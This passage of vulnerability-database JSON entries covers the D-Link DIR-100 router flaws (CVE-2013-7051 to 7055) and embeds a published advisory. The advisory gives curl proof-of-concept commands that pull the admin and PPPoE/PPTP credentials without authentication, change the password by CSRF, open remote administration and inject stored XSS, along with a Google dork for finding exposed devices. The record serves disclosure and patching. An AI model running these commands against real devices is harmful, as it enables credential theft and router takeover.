\u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7055"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=31425",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-7055"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7055",
"trust": 3.5
},
{
"db": "BID",
"id": "65290",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01479",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "45769",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "31425",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-7055",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"id": "VAR-202002-0670",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
}
]
},
"last_update_date": "2024-11-23T21:36:11.547000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "Patch for D-Link DIR-100 Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44085"
},
{
"title": "D-Link DIR-100 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107311"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.0
},
{
"problemtype": "Insufficient protection of credentials (CWE-522) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90903"
},
{
"trust": 2.4,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.7,
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/45769"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/522.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/65290"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/31425/"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"date": "2020-02-04T00:00:00",
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"date": "2020-02-04T14:15:12.450000",
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"date": "2020-02-04T00:00:00",
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"date": "2020-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"date": "2024-11-21T02:00:15.093000",
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-100\u00a0 Vulnerable to insufficient protection of credentials",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
}
],
"trust": 0.6
}
}
var-202002-0669
Vulnerability from variot
D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0669",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 0.4
},
"cve": "CVE-2013-7054",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2013-7054",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-01478",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2013-7054",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2013-7054",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7054",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-7054",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-01478",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-035",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
